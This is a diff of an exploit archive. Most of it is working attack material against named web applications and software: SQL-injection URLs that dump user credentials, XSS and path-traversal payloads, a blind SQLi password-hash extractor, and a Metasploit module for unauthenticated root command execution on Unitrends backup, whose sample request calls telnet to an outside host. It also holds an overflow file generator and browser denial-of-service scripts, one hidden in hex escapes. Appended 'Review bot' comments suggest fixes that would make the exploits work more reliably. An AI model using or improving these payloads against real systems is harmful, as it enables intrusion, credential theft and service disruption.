http://www.example.com/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=%20%2527bookoo%2527/*


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34225/info
PHPCMS2008 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to PHPCMS2008 2009.03.17 are vulnerable.
http://www.example.com/ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34232/info
Comparison Engine Power is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Comparison Engine Power 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/comparisonengine/product.comparision.php?cat=null union all select 1,concat_ws(0x3a,id,email,password,nickname),3,4,5 from daype_users_tb--&name=GSM

10
platforms/php/webapps/32880.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/34324/info
Turnkey eBook Store is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
Turnkey eBook Store 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?cmd=search&keywords="><script>alert('XSS')</script>
http://www.example.com/index.php?cmd=search&keywords=<META HTTP-EQUIV="refresh" content="0; URL=http://www.example2.net">

14
platforms/php/webapps/32887.txt Executable file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/34348/info
osCommerce is prone to a session-fixation vulnerability.
Attackers can exploit this issue to hijack a user's session and gain unauthorized access to the affected application.
The following are vulnerable:
osCommerce 2.2
osCommerce 3.0 Beta
Other versions may also be affected.
http://www.example.com/myapp/index.php?oscid=arbitrarysession

11
platforms/php/webapps/32889.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/34355/info
4CMS is prone to multiple SQL-injection vulnerabilities and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting the SQL-injection issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The attacker can exploit the local file-include issue to execute arbitrary local script code and obtain sensitive information that may aid in further attacks.
http://www.example.com/frontend/article.php?aid=-9999+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10+from+users--
http://www.example.com/frontend/articles.php?cid=-999+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10+from+users--
http://www.example.com/frontend/index.php?chlang=../../../../etc/services%00


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34500/info
LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks.
Versions prior to LinPHA 1.3.4 are vulnerable.
http://www.example.com/linpha-1.3.2/login.php?ref=&#039;><script>alert(1)</ScRiPt>

10
platforms/php/webapps/32906.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/34500/info
LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks.
Versions prior to LinPHA 1.3.4 are vulnerable.
http://www.example.com/test/linpha-1.3.2/new_images.php?order=%22%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/test/linpha-1.3.2/new_images.php?pn=%22%3Cscript%3Ealert(1)%3C/script%3E

10
platforms/php/webapps/32910.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/34551/info
Phorum is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
Phorum 5.2.10 and 5.2-dev are vulnerable; other versions may also be affected.
http://www.example.com/phorum-5.2.10/admin.php?module=badwords&curr=1"><img/src/onerror="
alert('voodoo');&delete=1


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34551/info
Phorum is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
Phorum 5.2.10 and 5.2-dev are vulnerable; other versions may also be affected.
http://www.example.com/phorum-5.2.10/admin.php?module=banlist&curr=1"><img/src/onerror="alert('voodoo');&delete=1

12
platforms/php/webapps/32912.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/34551/info
Phorum is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
Phorum 5.2.10 and 5.2-dev are vulnerable; other versions may also be affected.
POST /www.example.com/admin.php HTTP/1.1
module=users&referrer=http%3A%2F%2Fwww.victim.com%2Fphorum-5.2.10%2Fadmin.php%3Fmodule%3Dusers
&addUser=1&username=xss&real_name=xss&email=%3Ciframe%2Fsrc%3D%22javascript%3Aalert%28%27voodoo%27%29%3B%22%3E&password1=xss&password2=xss&admin=0

11
platforms/php/webapps/32913.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/34551/info
Phorum is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
Phorum 5.2.10 and 5.2-dev are vulnerable; other versions may also be affected.
javascript:with(document)cookie="phorum_upgrade_available=
<iframe/src='javascript:alert(/voodoo/.source)'>",
location="http://www.victim.com/phorum-5.2.10/versioncheck.php";

97
platforms/php/webapps/32914.php Executable file

@ -0,0 +1,97 @@
source: http://www.securityfocus.com/bid/34553/info
Geeklog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Geeklog 1.5.2 and earlier are vulnerable.
tmp); $i++) {
$tmp_i = explode(";", $tmp[$i]);
$cookies .= $tmp_i[0]."; ";
}
if (stripos ($cookies, "\x70\x61\x73\x73\x77\x6f\x72\x64")) {
return $cookies;
} else {
die("[*] Unable to login!");
}
}
function xtrct_prefix() {
global $host, $port, $path, $cookies, $url;
$out = _s($url, $cookies, 0, "");
$tmp = explode("\x62\x6c\x6f\x63\x6b\x73\x5b\x5d", $out);
if (count($tmp) < 2) {
die("[!] Not logged in!");
}
$tmp = explode("\x22", $tmp[0]);
$prefix = $tmp[count($tmp)-1];
return $prefix;
}
function is_checked() {
global $host, $port, $path, $cookies, $url;
$out = _s($url, $cookies, 0, "");
$tmp = explode("\x62\x6c\x6f\x63\x6b\x73\x5b\x5d", $out);
$tmp = explode("\x3e", $tmp[1]);
$s = $tmp[0];
if (stripos ($s, "\x22\x63\x68\x65\x63\x6b\x65\x64\x22")) {
return 1;
} else {
return 0;
}
}
if (!$_use_ck) {
$cookies = login();
}
$url = "http://$host:$port".$path."usersettings.php";
$prefix = xtrct_prefix();
print "[*] prefix->'".$prefix."'\n";
if (!$_skiptest) {
run_test();
}
if ($_test) {
die;
}
#uncheck all boxes
$rst_sql = "0) AND 0 UNION SELECT 1,0x61646d696e5f626c6f636b FROM ".$prefix."users WHERE
".$where." LIMIT 1/*";
$out = _s($url, $cookies, 1, "mode=savepreferences&".$prefix."blocks[0]=".urlencode($rst_sql)."&");
#then start extraction
$c = array();
$c = array_merge($c, range(0x30, 0x39));
$c = array_merge($c, range(0x61, 0x66));
$url = "http://$host:$port".$path;
$_hash = "";
print ("[*] Initiating hash extraction ...\n");
for ($j = 1; $j < 0x21; $j++) {
for ($i = 0; $i <= 0xff; $i++) {
$f = false;
if (in_array($i, $c)) {
$sql = "0) AND 0 UNION SELECT 1,IF(ASCII(SUBSTR(passwd FROM $j FOR
1))=$i,1,0x61646d696e5f626c6f636b) FROM ".$prefix."users WHERE ".$where." LIMIT 1/*";
$url = "http://$host:$port".$path."usersettings.php";
$out = _s($url, $cookies, 1,
"mode=savepreferences&".$prefix."blocks[0]=".urlencode($sql)."&");
if (is_checked()) {
$f = true;
$_hash .= chr($i);
print "[*] Md5 Hash: ".$_hash.str_repeat("?", 0x20-$j)."\n";
#if found , uncheck again
$out = _s($url, $cookies, 1,
"mode=savepreferences&".$prefix."blocks[0]=".urlencode($rst_sql)."&");
break;
}
}
}
if ($f == false) {
die("\n[!] Unknown error ...");
}
}
print "[*] Done! Cookie: geeklog=$uid; password=".$_hash.";\n";
?>
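Review bot: The committed file is a fragment, not the script as published: after the four advisory lines it begins mid-expression with `tmp); $i++) {`, there is no opening `<?php` tag, and `_s()`, `run_test()`, `$host`, `$port`, `$path`, `$where`, `$uid`, `$_use_ck`, `$_skiptest` and `$_test` are all used without being defined anywhere in the hunk. The loss looks like an import artefact (something dropping a span of the original text), though I cannot tell the cause from the hunk alone. Either re-import the original from the BID source or add a leading comment such as `# NOTE: incomplete — the beginning of the original script was lost on import` so archive consumers do not mistake this for the complete file.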


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33880/info
Adobe Flash Player is prone to a remote code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will likely crash the application, denying service to legitimate users.
Versions prior to Flash Player 10.0.12.36 are vulnerable.
http://www.exploit-db.com/sploits/32811.rar
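Review bot: The entry's only payload is a link to an external binary archive, `http://www.exploit-db.com/sploits/32811.rar`, with no description of its contents and no checksum, so anyone consuming the archive cannot verify that what they download is what was catalogued. Record at least a digest alongside the link, e.g. `sha256: <HASH-OF-32811.rar>`, and a one-line note of what the archive contains.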

101
platforms/unix/remote/32885.rb Executable file

@ -0,0 +1,101 @@
Unitrends Enterprise Backup 7.3.0
Multiple vulnerabilities exist within this piece of software. The largest one is likely the fact that the auth string used for authorization isnt random at all. After authentication, any requests made by the browser send no cookies and only check this auth param, which is completely insufficient. Because of this, unauthenticated users can know what the auth parameter should be and make requests as the root user.
Unauthenticated root RCE
Because the auth variable is not random, an unauthenticated user can post a specially crafted request to the /recoveryconsole/bpl/snmpd.php PHP script. This script does not sanitize the SNMP community string properly which allows the user to execute remote commands as the root user. A metasploit module that exploits this has been given alongside this report. Below is the actual request. To recreate, after authentication, click on Settings -> Clients, Networking, and Notifications -> SNMP and Modify the notpublic entry to contain bash metacharacters.
POST /recoveryconsole/bpl/snmpd.php?type=update&sid=1&comm=notpublic`telnet+172.31.16.166+4444`&enabled=1&rx=4335379&ver=7.3.0&gcv=0 HTTP/1.1
Host: 172.31.16.99
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Referer: https://172.31.16.99/recoveryconsole/bpria/bin/bpria.swf?vsn=7.3.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
auth=1%3A%2Fusr%2Fbp%2Flogs%2Edir%2Fgui%5Froot%2Elog%3A100
-----------------------------------
Metasploit module:
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Unitrends Unauthenticated Root RCE",
'Description' => %q{
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry <bperry.volatile[at]gmail.com>' #discovery/metasploit module
],
'References' =>
[
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['Unitrends Enterprise Backup 7.3.0', {}]
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'python telnet netcat perl'
}
},
'DisclosureDate' => "Mar 21 2014",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']),
], self.class)
end
def exploit
pay = Rex::Text.encode_base64(payload.encoded)
get = {
'type' => 'update',
'sid' => '1',
'comm' => 'notpublic`echo '+pay+'|base64 --decode|sh`',
'enabled' => '1',
'rx' => '4335379',
'ver' => '7.3.0',
'gcv' => '0'
}
post = {
'auth' => '1:/usr/bp/logs.dir/gui_root.log:100'
}
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'recoveryconsole', 'bpl', 'snmpd.php'),
'vars_get' => get,
'vars_post' => post,
'method' => 'POST'
})
end
end
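Review bot: The `exploit` method at the end of the module discards the return value of `send_request_cgi`, so an unreachable host, a non-2xx reply or a changed `auth` token all look like success to the framework; capture it and fail explicitly, `res = send_request_cgi({ ... })` followed by `fail_with(Failure::Unreachable, 'No response from the target') unless res`. The `'Description'` and `'References'` entries are empty even though the advisory text above the module explains the bug; the paragraph on the predictable `auth` token and the unsanitized SNMP community string passed to `/recoveryconsole/bpl/snmpd.php` belongs in the description. The hard-coded `'auth' => '1:/usr/bp/logs.dir/gui_root.log:100'` also deserves a one-line comment stating that it is the static, non-random token the advisory describes rather than a per-install secret, since a reader of the module alone cannot tell. The `http//metasploit.com/download` URL in the header comment is missing its colon.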


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/34383/info
The Apache 'mod_perl' module is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E


@ -1,4 +1,4 @@
# Exploit Title: Notepad++ - DSpellCheck plugin[DOS]
# Exploit Title: Notepad++ - DSpellCheck v1.2.12.0 plugin[DOS]
# Exploit Author: sajith
# Vendor Homepage: http://notepad-plus-plus.org/
# Software Link: http://notepad-plus-plus.org/download/

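--- a/platforms/windows/dos/32824.pl
+++ b/platforms/windows/dos/32824.pl
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/33934/info
+Internet Download Manager (IDM) is prone to a remote buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
+An attacker may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+This issue affects IDM 5.15 Build 3; other versions may also be vulnerable.
+#Internet Download Manager v.5.15 Build 3 (4 December)
+#Works on Vista
+#HellCode Labs || TCC Group || http://tcc.hellcode.net
+#Bug was found by "musashi" aka karak0rsan
+[musashi@hellcode.net]
+#thanx to murderkey
+$file="idm_tr.lng";
+$lng= "lang=0x1f Türkçe";
+$buffer = "\x90" x 1160;
+$eip = "AAAA";
+$toolbar = "20376=";
+$packet=$toolbar.$buffer.$eip;
+open(file, '>' . $file);
+print file $lng;
+print file "\n";
+print file $packet;
+close(file);
+print "File has created!\n";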
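Review bot: `open(file, '>' . $file);` uses a bareword handle and never checks the result, so a failed open silently leaves no usable `idm_tr.lng` while the script still prints "File has created!"; use `open my $fh, '>', $file or die "open $file: $!";` with `print {$fh} ...` and `close $fh or die "close $file: $!";`. The line `[musashi@hellcode.net]` sits outside any `#` comment; if it really is a line of its own in the file rather than a wrapped tail of the credit comment above it, it is a bare expression followed by `$file=` with no separating semicolon and is very likely a syntax error, so prefix it with `#` (the script also lacks `use strict; use warnings;`). `$lng` contains the non-ASCII string `Türkçe` and the handle has no encoding layer, so the bytes written depend on the source file's own encoding; a comment stating which encoding IDM expects for `.lng` files (not determinable from this script) would help whoever reproduces the crash.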

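--- a/platforms/windows/dos/32881.py
+++ b/platforms/windows/dos/32881.py
@@ -0,0 +1,187 @@
+source: http://www.securityfocus.com/bid/34327/info
+QtWeb browser is prone to a remote denial-of-service vulnerability.
+Attackers can exploit this issue to crash the affected application, denying service to legitimate users.
+QtWeb 2.0 is vulnerable; other versions may also be affected.
+$S="\x3C\x68\x74\x6D\x6C\x3E\x0D\x0A".
+"\x3C\x74\x69\x74\x6C\x65\x3E\x51\x74\x57\x65\x62".
+"\x20\x49\x6E\x74\x65\x72\x6E\x65\x74\x20\x42\x72\x6F\x77\x73\x65".
+"\x72\x20\x32". "\x2E\x30\x20".
+"\x28\x62". "\x75\x69".
+"\x6C\x64". "\x20\x30".
+"\x34\x33". "\x29\x20".
+"\x52\x65". "\x6D\x6F".
+"\x74\x65". "\x20\x44".
+"\x65\x6E". "\x69\x61".
+"\x6C\x20". "\x6F\x66".
+"\x20\x53". "\x65\x72".
+"\x76\x69". "\x63\x65".
+"\x20\x45". "\x78\x70".
+"\x6C\x6F". "\x69\x74". "\x3C\x2F". "\x54\x69".
+"\x74\x6C". "\x65". "\x3E". "\x0D". "\x0A". "\x3C\x68".
+"\x65\x61". "\x64". "\x3E". "\x3C". "\x62". "\x6F\x64".
+"\x79\x3E". "\x3C". "\x73". "\x63". "\x72". "\x69\x70".
+"\x74\x20". "\x74\x79".
+"\x70\x65". "\x3D\x22".
+"\x74\x65". "\x78\x74".
+"\x2F\x6A". "\x61\x76".
+"\x61\x73". "\x63\x72".
+"\x69\x70". "\x74\x22".
+"\x3E\x0D". "\x0A\x61".
+"\x6C\x65". "\x72\x74".
+"\x28\x22". "\x51\x74".
+"\x57\x65". "\x62\x20".
+"\x49\x6E". "\x74\x65".
+"\x72\x6E". "\x65\x74".
+"\x20\x42". "\x72\x6F".
+"\x77\x73". "\x65\x72".
+"\x20\x32". "\x2E\x30".
+"\x20\x28". "\x62". "\x75". "\x69\x6C".
+"\x64\x20". "\x30". "\x34". "\x33\x29".
+"\x20\x52". "\x65". "\x6D". "\x6F\x74".
+"\x65\x20". "\x44". "\x65". "\x6E\x69".
+"\x61\x6C". "\x20". "\x6F". "\x66\x20".
+"\x53\x65". "\x72". "\x76". "\x69\x63".
+"\x65\x20". "\x45". "\x78". "\x70\x6C".
+"\x6F\x69". "\x74". "\x5C". "\x6E\x5C".
+"\x6E\x5C". "\x74". "\x5C". "\x74\x5C".
+"\x74\x62". "\x79". "\x20". "\x4C\x69".
+"\x71\x75". "\x69". "\x64". "\x57\x6F".
+"\x72\x6D". "\x20". "\x28". "\x63\x29".
+"\x20\x32". "\x30". "\x30". "\x39\x22".
+"\x29\x3B". "\x0D\x0A\x66". "\x75\x6E".
+"\x63\x74". "\x69\x6F".
+"\x6E\x20". "\x64\x6F".
+"\x7A\x28". "\x29\x20".
+"\x7B\x0D". "\x0A\x74".
+"\x69\x74". "\x6C\x65".
+"\x71\x75". "\x69". "\x64". "\x57\x6F".
+"\x72\x6D". "\x20". "\x28". "\x63\x29".
+"\x20\x32". "\x30". "\x30". "\x39\x22".
+"\x29\x3B". "\x0D\x0A\x66". "\x75\x6E".
+"\x63\x74". "\x69\x6F".
+"\x6E\x20". "\x64\x6F".
+"\x7A\x28". "\x29\x20".
+"\x7B\x0D". "\x0A\x74".
+"\x69\x74". "\x6C\x65".
+"\x3D\x22". "\x48\x6F".
+"\x74\x20". "\x49\x63".
+"\x65\x22". "\x3B\x0D".
+"\x0A\x75". "\x72\x6C".
+"\x3D\x22". "\x68\x74".
+"\x74\x70\x3A". "\x2F\x2F\x77".
+"\x77\x77\x2E\x6D\x69\x6C\x77\x30\x72\x6D\x2E\x63\x6F\x6D\x2F".
+"\x22\x3B\x0D\x0A\x69\x66\x20\x28\x77\x69\x6E\x64".
+"\x6F\x77\x2E\x73\x69\x64\x65\x62";$M=
+"\x61". "\x72" ."\x29". "\x20".
+"\x7B". "\x0D" ."\x0A". "\x77". "\x69".
+"\x6E"."\x64". "\x6F". "\x77". "\x2E".
+"\x73". "\x69". "\x64". "\x65".
+"\x62". "\x61". "\x72". "\x2E".
+"\x61". "\x64". "\x64". "\x50".
+"\x61". "\x6E". "\x65". "\x6C".
+"\x28". "\x74". "\x69". "\x74".
+"\x6C". "\x65". "\x2C". "\x20".
+"\x75". "\x72". "\x6C". "\x2C".
+"\x22". "\x22". "\x29". "\x3B".
+"\x0D". "\x0A"."\x7D".
+"\x20". "\x65". "\x6C".
+"\x73";
+$I="\x65\x20\x69\x66\x28\x20\x77".
+"\x69\x6E\x64\x6F\x77".
+"\x2E\x65\x78\x74\x65\x72\x6E".
+"\x61\x6C\x20\x29\x20". ##############
+"\x7B\x0D\x0A\x77\x69\x6E\x64". ## #
+"\x6F\x77\x2E\x65"."\x78". ######
+"\x74\x65\x72\x6E\x61". ########## _ _ _
+"\x6C\x2E\x41\x64\x64\x46\x61\x76\x6F\x72\x69". #==---- #==---- #==----
+"\x74\x65\x28\x20\x75".
+"\x72\x6C\x2C\x20\x74". ##===*
+"\x69\x74\x6C\x65\x29\x3B\x0D".
+"\x0A\x7D\x20\x65\x6C".
+"\x73\x65\x20\x69\x66\x28\x77".
+"\x69\x6E\x64\x6F\x77".
+"\x2E\x6F\x70\x65\x72\x61\x20";
+####################
+$L="\x26\x26\x20\x77\x69\x6E\x64\x6F\x77\x2E".
+"\x70\x72\x69\x6E\x74\x29\x20\x7B".
+"\x20\x0D\x0A\x72\x65\x74".
+"\x75\x72\x6E\x20".
+"\x28\x74\x72".
+"\x75\x65".
+"\x29".
+"\x3B".
+"\x20\x7D".
+"\x7D\x0D\x0A".
+"\x76\x61\x72\x20".
+"\x61\x73\x6B\x20\x3D\x20".
+"\x63\x6F\x6E\x66\x69\x72\x6D\x28".
+"\x22\x50\x72\x65\x73\x73\x20\x4F\x4B\x20".
+"\x74\x6F\x20\x73\x74\x61\x72\x74".
+"\x20\x74\x68\x65\x20\x44".
+"\x6F\x53\x2E\x5C".
+"\x6E\x50\x72".
+"\x65\x73".
+"\x73".
+"\x20".
+"\x4E\x6F".
+"\x20\x74\x6F".
+"\x20\x64\x6F\x64".
+"\x67\x65\x20\x74\x68\x65".
+"\x20\x44\x6F\x53\x2E\x22\x29\x3B".
+"\x0D\x0A\x69\x66\x20\x28\x61\x73\x6B\x20".
+"\x3D\x3D\x20\x74\x72\x75\x65\x29".
+"\x20\x7B\x20\x0D\x0A\x66".
+"\x6F\x72\x20\x28".
+"\x78\x3D\x30".
+"\x3B\x20".
+"\x78".
+"\x3C".
+"\x78\x2B".
+"\x31\x3B\x20".
+"\x78\x2B\x2B\x29".
+"\x20\x64\x6F\x7A\x28\x29".
+"\x3B\x0D\x0A\x7D\x20\x65\x6C\x73".
+"\x65\x09\x7B\x20\x61\x6C\x65\x72\x74\x28".
+"\x22\x4F\x6B\x20\x3A\x28\x22\x29".
+"\x3B\x0D\x0A\x77\x69\x6E".
+"\x64\x6F\x77\x2E".
+"\x6C\x6F\x63".
+"\x61\x74".
+"\x69".
+"\x6F".
+"\x6E\x2E".
+"\x68\x72\x65".
+"\x66\x20\x3D\x20".
+"\x22\x68\x74\x74\x70\x3A".
+"\x2F\x2F\x77\x77\x77\x2E\x71\x74".
+"\x77\x65\x62\x2E\x6E\x65\x74\x2F\x22\x3B";
+#########
+$E="\x0D\x0A\x7D\x20".
+"\x3C\x2F\x73\x63".
+"\x72\x69\x70\x74".
+"\x3E\x3C\x2F\x62".
+"\x6F\x64\x79\x3E".
+"\x3C\x2F\x68\x65".
+"\x61\x64\x3E\x3C".
+"\x2F\x68\x74\x6D".
+"\x6C\x3E";#####____
+my $file = "Smile.html";
+my $fun = $S.$M.$I.$L.$E;
+open (mrowdiuqil, ">./$file") || die "\nMffff... $!\n";
+print mrowdiuqil "$fun";
+close (mrowdiuqil);
+print "\n[+] File $file created with funny potion\!\n\n";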
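Review bot: The nine lines from `"\x71\x75". "\x69". "\x64". "\x57\x6F".` through `"\x69\x74". "\x6C\x65".` in the middle of `$S` are an exact repeat of the nine lines immediately above them (they decode to `quidWorm (c) 2009");\r\nfunction doz() {\r\ntitle`), so the generated script reads `function doz() {\r\ntitlequidWorm (c) 2009");\r\nfunction doz() {\r\ntitle="Hot Ice"`, which is a JavaScript syntax error; a browser discards the whole `<script>` block on a parse error, so the `doz()` loop never runs and `Smile.html` as written does not trigger the DoS — delete the duplicated run. Because the page is emitted entirely as hex escapes, a header comment should say what it decodes to: an HTML page whose script, after a `confirm()` prompt, calls `doz()` in a `for (x=0; x<x+1; x++)` loop, where `doz()` invokes `window.sidebar.addPanel` or `window.external.AddFavorite` with a fixed title and URL. `open (mrowdiuqil, ">./$file")` is a bareword, two-argument open and the script has no `use strict; use warnings;`; `open my $fh, '>', "./$file" or die ...` is the idiomatic form. The file is Perl despite its `.py` name, which the corpus entry should note so the language classifier stops mislabeling it.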

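--- a/platforms/windows/dos/32902.py
+++ b/platforms/windows/dos/32902.py
@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/34478/info
+Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability.
+Successful exploits can allow attackers to hang the affected browser, resulting in denial-of-service conditions.
+#/usr/bin/env python
+import sys
+import random
+CHAR_SET = [chr(x) for x in range(0x20)]
+CHAR_SET += [chr(x) for x in range(128, 256)]
+def send_file():
+l = 800000 + 4096
+print "Content-Type: text/plain"
+print "Content-Length: %d" % l
+print "Cache-Control: no-cache, no-store, must-revalidate"
+# this is not standardized, but use it anyway
+print "Pragma: no-cache"
+print ""
+# bypass IE download dialog
+sys.stdout.write("a" * 4096)
+# print junks
+for i in xrange(l):
+sys.stdout.write(random.choice(CHAR_SET))
+sys.exit()
+send_file()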
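Review bot: The body length is mis-declared in `send_file`: `l = 800000 + 4096` is announced as `Content-Length`, but the function then writes the 4096-byte `"a"` prefix plus `l` random bytes, 4096 bytes more than announced, so a client honoring the header stops reading early and on a keep-alive connection the excess bytes corrupt the next response; either loop `for i in xrange(l - 4096):` or announce `l + 4096`. The shebang `#/usr/bin/env python` is missing the `!`, so a web server executing this as a CGI script finds no interpreter line; it should read `#!/usr/bin/env python`. A short comment explaining why the 4096 "a" bytes come first (the inline comment only says "bypass IE download dialog", presumably to get past content sniffing — worth confirming) and that the output relies on Python 2 byte strings written to stdout would help whoever reproduces the hang.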
